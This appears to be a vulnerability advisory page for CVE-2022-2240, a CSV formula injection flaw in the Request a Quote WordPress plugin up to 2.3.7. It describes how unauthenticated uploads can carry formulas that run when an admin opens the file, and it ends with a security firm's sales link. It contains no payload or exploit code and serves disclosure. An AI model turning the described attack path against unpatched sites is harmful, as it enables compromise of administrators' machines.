CVE-2022-2240
Request a Quote <= 2.3.7 - CSV Injection
In short
The Request a Quote WordPress plugin up to version 2.3.7 allows anyone to upload a malicious CSV file without checking it first. When an admin downloads and opens this file, it can execute harmful commands on their computer.
Technical detail
The plugin fails to validate uploaded CSV files, allowing unauthenticated attackers to inject formula injection payloads (CWE-1236) via quote attachments. When an administrator downloads and opens the malicious CSV in spreadsheet software, the injected formulas execute with admin privileges, potentially leading to code execution or data exfiltration.
Summary generated and translated by AI from the official description.
The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to a CSV injection once an admin download and open it
Affected products
Unknown · Request a QuoteWant to know if your infrastructure is exposed to this?
Talk to TrueHacking →